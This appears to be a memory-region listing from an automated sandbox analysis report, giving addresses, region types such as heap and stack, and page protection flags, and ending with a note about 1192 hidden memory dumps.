page read and write
2EC2000
heap
page read and write
9B93000
trusted library allocation
page read and write
8650000
trusted library allocation
page read and write
6DFE000
stack
page read and write
8E59000
trusted library allocation
page read and write
3135CFF000
stack
page read and write
8E57000
trusted library allocation
page read and write
30BB000
heap
page read and write
7AB2000
heap
page read and write
2F4C000
heap
page read and write
8D3F000
trusted library allocation
page read and write
5D61000
trusted library allocation
page read and write
8DED000
trusted library allocation
page read and write
2D00000
trusted library allocation
page read and write
2B30000
heap
page read and write
A9CE000
stack
page read and write
7D26000
trusted library allocation
page read and write
6F25000
heap
page execute and read and write
327D000
stack
page read and write
31C8000
heap
page read and write
2E3E000
stack
page read and write
83CD000
stack
page read and write
A85000
unkown
page write copy
8A85000
trusted library allocation
page read and write
774E000
stack
page read and write
29F0000
trusted library allocation
page read and write
27DD000
stack
page read and write
48C8000
trusted library allocation
page read and write
8E25000
trusted library allocation
page read and write
6398000
trusted library allocation
page read and write
8D65000
trusted library allocation
page read and write
8DE1000
trusted library allocation
page read and write
8CEF000
trusted library allocation
page read and write
8D9D000
trusted library allocation
page read and write
6EEE000
stack
page read and write
2CD3000
trusted library allocation
page execute and read and write
793B000
stack
page read and write
8E53000
trusted library allocation
page read and write
8D77000
trusted library allocation
page read and write
2F4F000
heap
page read and write
6C2F000
stack
page read and write
7A00000
heap
page execute and read and write
8C91000
trusted library allocation
page read and write
80FE000
stack
page read and write
56CE000
stack
page read and write
A154000
unclassified section
page write copy
AB8E000
stack
page read and write
8DBD000
trusted library allocation
page read and write
8D8F000
trusted library allocation
page read and write
786E000
stack
page read and write
3590000
heap
page read and write
935E000
trusted library allocation
page execute and read and write
2DA9000
heap
page read and write
2637000
stack
page read and write
6CDB000
stack
page read and write
2F4D000
heap
page read and write
7C7B000
stack
page read and write
8DFF000
trusted library allocation
page read and write
8CED000
trusted library allocation
page read and write
8CA7000
trusted library allocation
page read and write
5A43000
trusted library allocation
page read and write
8E65000
trusted library allocation
page read and write
8DE5000
trusted library allocation
page read and write
A993000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
8C97000
trusted library allocation
page read and write
6ADE000
stack
page read and write
2DAD000
stack
page read and write
A60000
unkown
page write copy
8CC1000
trusted library allocation
page read and write
6DDD000
stack
page read and write
8610000
trusted library allocation
page read and write
4EB7000
trusted library allocation
page read and write
AB45000
unclassified section
page read and write
7AE0000
heap
page read and write
4960000
heap
page read and write
A19E000
stack
page read and write
2F2B000
heap
page read and write
319A000
heap
page read and write
8CFF000
trusted library allocation
page read and write
7550000
trusted library allocation
page read and write
8D1B000
trusted library allocation
page read and write
7B74000
heap
page read and write
8E37000
trusted library allocation
page read and write
2F2B000
heap
page read and write
8D0D000
trusted library allocation
page read and write
7180000
trusted library allocation
page read and write
8E6D000
trusted library allocation
page read and write
4CE2000
trusted library allocation
page read and write
67EE000
stack
page read and write
6C6E000
stack
page read and write
564E000
stack
page read and write
8E77000
trusted library allocation
page read and write
5488000
trusted library allocation
page read and write
68AE000
stack
page read and write
78F0000
trusted library allocation
page read and write
9B97000
trusted library allocation
page read and write
294A000
heap
page read and write
683E000
trusted library allocation
page read and write
8D59000
trusted library allocation
page read and write
3343000
heap
page read and write
7530000
trusted library allocation
page read and write
58CE000
stack
page read and write
2C8A000
heap
page read and write
8CBF000
trusted library allocation
page read and write
4950000
trusted library allocation
page read and write
8E63000
trusted library allocation
page read and write
4EA2000
trusted library allocation
page read and write
31DF000
heap
page read and write
58B9000
trusted library allocation
page read and write
8D2F000
trusted library allocation
page read and write
9C36000
trusted library allocation
page read and write
2F10000
heap
page read and write
2B20000
heap
page read and write
2CE9000
trusted library allocation
page read and write
34D0000
trusted library section
page read and write
8420000
heap
page read and write
7B3D000
stack
page read and write
780D000
stack
page read and write
8DC5000
trusted library allocation
page read and write
AA0E000
stack
page read and write
7190000
trusted library allocation
page read and write
1CE3853E000
heap
page read and write
877A000
heap
page read and write
8D27000
trusted library allocation
page read and write
319A000
heap
page read and write
4830000
heap
page read and write
2F13000
heap
page read and write
75CB000
heap
page read and write
6B60000
heap
page read and write
8ED6000
trusted library allocation
page read and write
8E31000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
35DA000
trusted library allocation
page read and write
8630000
trusted library allocation
page read and write
A6A0000
trusted library section
page read and write
490B000
trusted library allocation
page read and write
8CD3000
trusted library allocation
page read and write
8819000
trusted library allocation
page read and write
4D4E000
stack
page read and write
78E0000
trusted library allocation
page read and write
8CF9000
trusted library allocation
page read and write
2F4F000
heap
page read and write
263D000
stack
page read and write
A86000
unkown
page readonly
8780000
heap
page read and write
6E9E000
stack
page read and write
801F000
stack
page read and write
7342000
trusted library allocation
page read and write
2D02000
trusted library allocation
page read and write
6331000
trusted library allocation
page read and write
8DDD000
trusted library allocation
page read and write
6D60000
trusted library section
page read and write
8E81000
trusted library allocation
page read and write
8E0B000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page read and write
A67000
unkown
page read and write
68C5000
heap
page execute and read and write
5BF0000
heap
page read and write
320C000
heap
page read and write
2F1E000
heap
page read and write
6FE2000
heap
page read and write
4932000
trusted library allocation
page read and write
2F44000
heap
page read and write
8D17000
trusted library allocation
page read and write
3347000
heap
page read and write
8DE7000
trusted library allocation
page read and write
28E5000
heap
page read and write
2D95000
heap
page read and write
4DBA000
trusted library allocation
page read and write
8D85000
trusted library allocation
page read and write
51FF000
stack
page read and write
72BB000
stack
page read and write
8E7B000
trusted library allocation
page read and write
6EAE000
stack
page read and write
71BA000
stack
page read and write
8D11000
trusted library allocation
page read and write
528E000
stack
page read and write
84A7000
trusted library allocation
page read and write
27AE000
stack
page read and write
7680000
trusted library allocation
page read and write
8D6F000
trusted library allocation
page read and write
8CB3000
trusted library allocation
page read and write
2CD6000
stack
page read and write
4E70000
heap
page read and write
2A8B000
heap
page read and write
705E000
stack
page read and write
8E73000
trusted library allocation
page read and write
574E000
stack
page read and write
7222000
heap
page read and write
7258000
heap
page read and write
82C7000
stack
page read and write
8D2D000
trusted library allocation
page read and write
8E5D000
trusted library allocation
page read and write
3069000
trusted library allocation
page read and write
285E000
stack
page read and write
279D000
stack
page read and write
83A5000
trusted library allocation
page read and write
8C9D000
trusted library allocation
page read and write
4247000
heap
page read and write
8CBD000
trusted library allocation
page read and write
80BE000
stack
page read and write
6C7F000
heap
page read and write
8D3B000
trusted library allocation
page read and write
8C73000
trusted library allocation
page read and write
78A0000
trusted library allocation
page read and write
8750000
heap
page read and write
5771000
trusted library allocation
page read and write
8CBB000
trusted library allocation
page read and write
71C0000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
76CE000
stack
page read and write
A20000
unkown
page readonly
8E49000
trusted library allocation
page read and write
7F6D000
trusted library allocation
page read and write
2C79000
stack
page read and write
71F3000
trusted library allocation
page read and write
736C000
stack
page read and write
6D70000
trusted library allocation
page read and write
8D87000
trusted library allocation
page read and write
8E2D000
trusted library allocation
page read and write
2E2A000
heap
page read and write
6C80000
heap
page execute and read and write
8D73000
trusted library allocation
page read and write
5A5C000
trusted library allocation
page read and write
31360FE000
stack
page read and write
84B5000
trusted library allocation
page read and write
7830000
trusted library allocation
page read and write
71F0000
trusted library allocation
page read and write
2DB3000
stack
page read and write
8C79000
trusted library allocation
page read and write
8E05000
trusted library allocation
page read and write
82DD000
heap
page read and write
8D99000
trusted library allocation
page read and write
8E45000
trusted library allocation
page read and write
8C63000
trusted library allocation
page read and write
7170000
trusted library allocation
page read and write
8C5F000
trusted library allocation
page read and write
722F000
heap
page read and write
2F29000
heap
page read and write
7660000
trusted library allocation
page read and write
81AC000
heap
page read and write
3330000
heap
page read and write
A54000
unkown
page readonly
2F20000
trusted library allocation
page read and write
6E9E000
stack
page read and write
2EF3000
heap
page read and write
2D20000
heap
page read and write
269C000
stack
page read and write
2F4F000
heap
page read and write
4D00000
trusted library allocation
page read and write
A60000
unkown
page read and write
82E0000
trusted library allocation
page execute and read and write
7B70000
trusted library allocation
page read and write
4CD0000
trusted library allocation
page read and write
2CFA000
trusted library allocation
page execute and read and write
8E91000
trusted library allocation
page read and write
8A69000
trusted library allocation
page read and write
7F420000
trusted library allocation
page execute and read and write
75AF000
heap
page read and write
AA65000
trusted library allocation
page read and write
2F40000
trusted library allocation
page execute and read and write
4350000
heap
page read and write
5A57000
trusted library allocation
page read and write
27BB000
heap
page read and write
4CB3000
trusted library allocation
page execute and read and write
58D9000
trusted library allocation
page read and write
3140000
heap
page read and write
A98C000
stack
page read and write
78D0000
trusted library allocation
page read and write
4344000
trusted library allocation
page read and write
81D1000
trusted library allocation
page read and write
47DC000
stack
page read and write
8E8D000
trusted library allocation
page read and write
590B000
stack
page read and write
8301000
heap
page read and write
758F000
heap
page read and write
6FEE000
stack
page read and write
8D39000
trusted library allocation
page read and write
7C40000
trusted library allocation
page read and write
694E000
stack
page read and write
7EF10000
trusted library allocation
page execute and read and write
A140000
unclassified section
page readonly
2A32000
trusted library allocation
page read and write
8DE3000
trusted library allocation
page read and write
2ED0000
heap
page read and write
3290000
heap
page read and write
8D7B000
trusted library allocation
page read and write
4340000
trusted library allocation
page read and write
31D1000
heap
page read and write
8DD5000
trusted library allocation
page read and write
4CA0000
trusted library allocation
page read and write
743E000
stack
page read and write
9971000
trusted library allocation
page read and write
8E99000
trusted library allocation
page read and write
2A19000
trusted library allocation
page read and write
477E000
stack
page read and write
8CE9000
trusted library allocation
page read and write
8CD5000
trusted library allocation
page read and write
72A7000
heap
page read and write
7B43000
heap
page read and write
8D95000
trusted library allocation
page read and write
8180000
heap
page read and write
78B0000
trusted library allocation
page read and write
8310000
trusted library allocation
page read and write
55CE000
stack
page read and write
8D83000
trusted library allocation
page read and write
2DD2000
stack
page read and write
4DE1000
trusted library allocation
page read and write
2DC7000
stack
page read and write
1CE38510000
heap
page read and write
8E5F000
trusted library allocation
page read and write
9908000
trusted library allocation
page read and write
ACAE000
stack
page read and write
3038000
stack
page read and write
8C5B000
trusted library allocation
page read and write
4C90000
heap
page read and write
7490000
trusted library allocation
page execute and read and write
8E71000
trusted library allocation
page read and write
2EC1000
heap
page read and write
7F438000
trusted library allocation
page execute and read and write
82F0000
trusted library allocation
page read and write
7160000
trusted library allocation
page read and write
7CCD000
stack
page read and write
2EF2000
heap
page read and write
8D6B000
trusted library allocation
page read and write
7890000
trusted library allocation
page read and write
7850000
trusted library allocation
page read and write
289F000
stack
page read and write
8C9B000
trusted library allocation
page read and write
3135AFE000
stack
page read and write
2F13000
heap
page read and write
23DC000
stack
page read and write
320C000
heap
page read and write
71C0000
heap
page read and write
6F9B000
stack
page read and write
3170000
heap
page read and write
6DBC000
stack
page read and write
2E7D000
stack
page read and write
7F0B0000
trusted library allocation
page execute and read and write
7C12000
heap
page read and write
4CEE000
stack
page read and write
2A10000
trusted library allocation
page read and write
2F53000
heap
page read and write
4D90000
heap
page readonly
7B73000
heap
page read and write
2A30000
trusted library allocation
page read and write
6F5D000
stack
page read and write
2EC3000
heap
page read and write
2F14000
heap
page read and write
8E4D000
trusted library allocation
page read and write
7200000
trusted library allocation
page read and write
35C1000
trusted library allocation
page read and write
2A60000
heap
page readonly
8C9F000
trusted library allocation
page read and write
6F47000
heap
page read and write
7900000
heap
page read and write
47CD000
trusted library allocation
page read and write
8E41000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
2A0D000
trusted library allocation
page execute and read and write
79E1000
heap
page read and write
8D09000
trusted library allocation
page read and write
8E3B000
trusted library allocation
page read and write
3183000
heap
page read and write
488E000
stack
page read and write
6C9D000
stack
page read and write
7BE0000
heap
page read and write
8D67000
trusted library allocation
page read and write
7C20000
trusted library allocation
page read and write
8C81000
trusted library allocation
page read and write
5A54000
trusted library allocation
page read and write
6A5B000
stack
page read and write
AB42000
unclassified section
page read and write
317A000
heap
page read and write
8CAF000
trusted library allocation
page read and write
2EC5000
heap
page read and write
8DB9000
trusted library allocation
page read and write
A04E000
trusted library allocation
page read and write
5394000
trusted library allocation
page read and write
8DEF000
trusted library allocation
page read and write
2F1E000
heap
page read and write
8DDF000
trusted library allocation
page read and write
8CC3000
trusted library allocation
page read and write
8050000
trusted library allocation
page read and write
81A8000
heap
page read and write
8DAB000
trusted library allocation
page read and write
690E000
stack
page read and write
2CF0000
trusted library allocation
page read and write
6EDD000
stack
page read and write
3340000
heap
page read and write
4CC0000
trusted library allocation
page read and write
74C0000
trusted library allocation
page read and write
481C000
stack
page read and write
9919000
trusted library allocation
page read and write
91DA000
trusted library allocation
page read and write
7820000
trusted library allocation
page execute and read and write
2A50000
trusted library allocation
page read and write
31BC000
heap
page read and write
7C42000
heap
page read and write
2F35000
heap
page read and write
2D13000
heap
page read and write
1CE3A0D0000
heap
page read and write
682E000
stack
page read and write
2F3F000
heap
page read and write
8CF1000
trusted library allocation
page read and write
8300000
trusted library allocation
page read and write
2F2F000
heap
page read and write
8C7B000
trusted library allocation
page read and write
7C00000
heap
page read and write
2F7B000
heap
page read and write
89CC000
trusted library allocation
page read and write
2E0B000
heap
page read and write
2F44000
heap
page read and write
28E2000
heap
page read and write
4CB0000
trusted library allocation
page read and write
A9A0000
trusted library allocation
page read and write
8C8D000
trusted library allocation
page read and write
4DB4000
trusted library allocation
page read and write
3169000
heap
page read and write
7B12000
heap
page read and write
578E000
stack
page read and write
52FF000
stack
page read and write
71A0000
trusted library allocation
page read and write
8E0D000
trusted library allocation
page read and write
2DBA000
stack
page read and write
8CD7000
trusted library allocation
page read and write
7F60000
trusted library allocation
page read and write
7582000
heap
page read and write
8DA5000
trusted library allocation
page read and write
8D89000
trusted library allocation
page read and write
2F4F000
heap
page read and write
35F0000
heap
page read and write
777D000
stack
page read and write
8DAD000
trusted library allocation
page read and write
7129000
trusted library allocation
page read and write
2F13000
heap
page read and write
530E000
stack
page read and write
4DC0000
trusted library allocation
page execute and read and write
3050000
trusted library allocation
page read and write
7140000
trusted library allocation
page read and write
8258000
heap
page read and write
7C30000
trusted library allocation
page read and write
8E8B000
trusted library allocation
page read and write
8CA1000
trusted library allocation
page read and write
8CF7000
trusted library allocation
page read and write
8E4B000
trusted library allocation
page read and write
2F78000
heap
page read and write
351E000
stack
page read and write
8770000
heap
page read and write
8A99000
trusted library allocation
page read and write
7BD0000
trusted library allocation
page read and write
8E03000
trusted library allocation
page read and write
8C87000
trusted library allocation
page read and write
28A0000
heap
page read and write
2EC1000
heap
page read and write
8CB5000
trusted library allocation
page read and write
8E3D000
trusted library allocation
page read and write
8DD7000
trusted library allocation
page read and write
3323000
heap
page read and write
778E000
stack
page read and write
5779000
trusted library allocation
page read and write
4D50000
heap
page readonly
804A000
trusted library allocation
page read and write
77CE000
stack
page read and write
8D0B000
trusted library allocation
page read and write
8E79000
trusted library allocation
page read and write
31358FA000
stack
page read and write
2C80000
heap
page read and write
8DBB000
trusted library allocation
page read and write
2A35000
trusted library allocation
page execute and read and write
8D57000
trusted library allocation
page read and write
7BF7000
stack
page read and write
2F58000
heap
page read and write
2EE0000
heap
page read and write
2F78000
heap
page read and write
8DBF000
trusted library allocation
page read and write
8C65000
trusted library allocation
page read and write
8DB1000
trusted library allocation
page read and write
7B11000
heap
page read and write
4D30000
heap
page execute and read and write
86AB000
stack
page read and write
86FF000
stack
page read and write
8EA3000
trusted library allocation
page read and write
8F50000
heap
page read and write
717E000
stack
page read and write
2A89000
heap
page read and write
2EF3000
heap
page read and write
31C3000
heap
page read and write
8620000
trusted library allocation
page read and write
8D69000
trusted library allocation
page read and write
2750000
heap
page read and write
3197000
heap
page read and write
5918000
trusted library allocation
page read and write
8CDF000
trusted library allocation
page read and write
7B01000
heap
page read and write
7810000
trusted library allocation
page read and write
2E4E000
stack
page read and write
2CC0000
trusted library allocation
page read and write
746E000
stack
page read and write
68C0000
heap
page execute and read and write
8E01000
trusted library allocation
page read and write
3390000
heap
page read and write
8DE9000
trusted library allocation
page read and write
496A000
heap
page read and write
2D5D000
heap
page read and write
8D8D000
trusted library allocation
page read and write
7880000
trusted library allocation
page read and write
7660000
heap
page read and write
7480000
heap
page read and write
7520000
trusted library allocation
page read and write
305D000
trusted library allocation
page execute and read and write
B4B000
stack
page read and write
2B0E000
stack
page read and write
7C42000
heap
page read and write
71FE000
stack
page read and write
8720000
trusted library allocation
page read and write
8020000
heap
page read and write
3393000
heap
page read and write
317E000
heap
page read and write
78C0000
trusted library allocation
page read and write
8D8B000
trusted library allocation
page read and write
3594000
heap
page read and write
598E000
stack
page read and write
609A000
trusted library allocation
page read and write
82D0000
heap
page read and write
7A10000
trusted library allocation
page read and write
7ABF000
stack
page read and write
318E000
stack
page read and write
8C59000
trusted library allocation
page read and write
7925000
heap
page read and write
6FD3000
heap
page read and write
8CFB000
trusted library allocation
page read and write
7A7E000
stack
page read and write
28B1000
heap
page read and write
7D30000
trusted library allocation
page read and write
4CB4000
trusted library allocation
page read and write
2C6E000
stack
page read and write
7047000
trusted library allocation
page read and write
2A2A000
trusted library allocation
page execute and read and write
7F70000
trusted library allocation
page read and write
2F0D000
heap
page read and write
8E69000
trusted library allocation
page read and write
3025000
heap
page read and write
74D0000
trusted library allocation
page read and write
2F35000
heap
page read and write
7D10000
heap
page read and write
8C6D000
trusted library allocation
page read and write
32A2000
heap
page read and write
7B11000
heap
page read and write
8D01000
trusted library allocation
page read and write
2E00000
heap
page read and write
698E000
stack
page read and write
26DD000
stack
page read and write
6C70000
heap
page read and write
2F2D000
heap
page read and write
8D6D000
trusted library allocation
page read and write
2F13000
heap
page read and write
1CE385DE000
heap
page read and write
8710000
trusted library allocation
page read and write
8E5B000
trusted library allocation
page read and write
8CA5000
trusted library allocation
page read and write
8C89000
trusted library allocation
page read and write
9CAE000
trusted library allocation
page read and write
2EF3000
heap
page read and write
8D4F000
trusted library allocation
page read and write
8CCB000
trusted library allocation
page read and write
4D8E000
stack
page read and write
584E000
stack
page read and write
8E61000
trusted library allocation
page read and write
8D29000
trusted library allocation
page read and write
3183000
heap
page read and write
8C95000
trusted library allocation
page read and write
7B40000
trusted library allocation
page read and write
54B0000
trusted library allocation
page read and write
3000000
heap
page read and write
6162000
trusted library allocation
page read and write
8D21000
trusted library allocation
page read and write
8E89000
trusted library allocation
page read and write
2ED0000
heap
page read and write
7958000
heap
page read and write
8DF1000
trusted library allocation
page read and write
3054000
trusted library allocation
page read and write
A745000
trusted library allocation
page read and write
2F39000
heap
page read and write
8E39000
trusted library allocation
page read and write
8E35000
trusted library allocation
page read and write
8E11000
trusted library allocation
page read and write
3190000
heap
page read and write
2CF2000
trusted library allocation
page read and write
1CE385B0000
heap
page read and write
8D4B000
trusted library allocation
page read and write
8030000
trusted library allocation
page execute and read and write
7272000
heap
page read and write
6039000
trusted library allocation
page read and write
8ABF000
trusted library allocation
page read and write
6E00000
trusted library allocation
page execute and read and write
2993000
heap
page read and write
74E0000
trusted library allocation
page read and write
2BD9000
heap
page read and write
8E33000
trusted library allocation
page read and write
319A000
heap
page read and write
6F6E000
stack
page read and write
46F0000
trusted library allocation
page read and write
8D97000
trusted library allocation
page read and write
35F7000
heap
page read and write
AC4F000
stack
page read and write
48B1000
trusted library allocation
page read and write
2F2E000
heap
page read and write
31BB000
heap
page read and write
9BA5000
trusted library allocation
page read and write
8E47000
trusted library allocation
page read and write
4C2E000
stack
page read and write
7F50000
trusted library allocation
page execute and read and write
8CA9000
trusted library allocation
page read and write
6339000
trusted library allocation
page read and write
8DC1000
trusted library allocation
page read and write
8E2F000
trusted library allocation
page read and write
2F91000
heap
page read and write
8130000
trusted library allocation
page read and write
A71E000
trusted library allocation
page read and write
686E000
stack
page read and write
5ACB000
stack
page read and write
7360000
trusted library allocation
page execute and read and write
8E15000
trusted library allocation
page read and write
8D7F000
trusted library allocation
page read and write
476E000
stack
page read and write
8D37000
trusted library allocation
page read and write
4DC5000
trusted library allocation
page read and write
81FA000
heap
page read and write
4DD0000
trusted library allocation
page read and write
4E7A000
heap
page read and write
7AE1000
heap
page read and write
7350000
trusted library allocation
page read and write
2ED0000
heap
page read and write
320C000
heap
page read and write
6A9E000
stack
page read and write
5B73000
trusted library allocation
page read and write
5320000
heap
page execute and read and write
75E1000
heap
page read and write
57D8000
trusted library allocation
page read and write
7C10000
trusted library allocation
page execute and read and write
2DCD000
stack
page read and write
8D51000
trusted library allocation
page read and write
707D000
stack
page read and write
96C3000
trusted library allocation
page read and write
7220000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
8C67000
trusted library allocation
page read and write
31361FF000
stack
page read and write
7BB0000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
7B11000
heap
page read and write
28F0000
heap
page read and write
4720000
heap
page execute and read and write
8EAD000
trusted library allocation
page read and write
7BFF000
trusted library allocation
page read and write
9BCA000
trusted library allocation
page read and write
8D5D000
trusted library allocation
page read and write
8E87000
trusted library allocation
page read and write
31E0000
heap
page read and write
7AFA000
heap
page read and write
2940000
heap
page read and write
8607000
stack
page read and write
8E83000
trusted library allocation
page read and write
2D10000
heap
page read and write
58B1000
trusted library allocation
page read and write
59E5000
trusted library allocation
page read and write
1CE385E5000
heap
page read and write
73BE000
stack
page read and write
8EA5000
trusted library allocation
page read and write
AAE0000
unclassified section
page readonly
2DBD000
stack
page read and write
8D93000
trusted library allocation
page read and write
8E27000
trusted library allocation
page read and write
84FE000
stack
page read and write
There are 1192 hidden memdumps, click here to show them.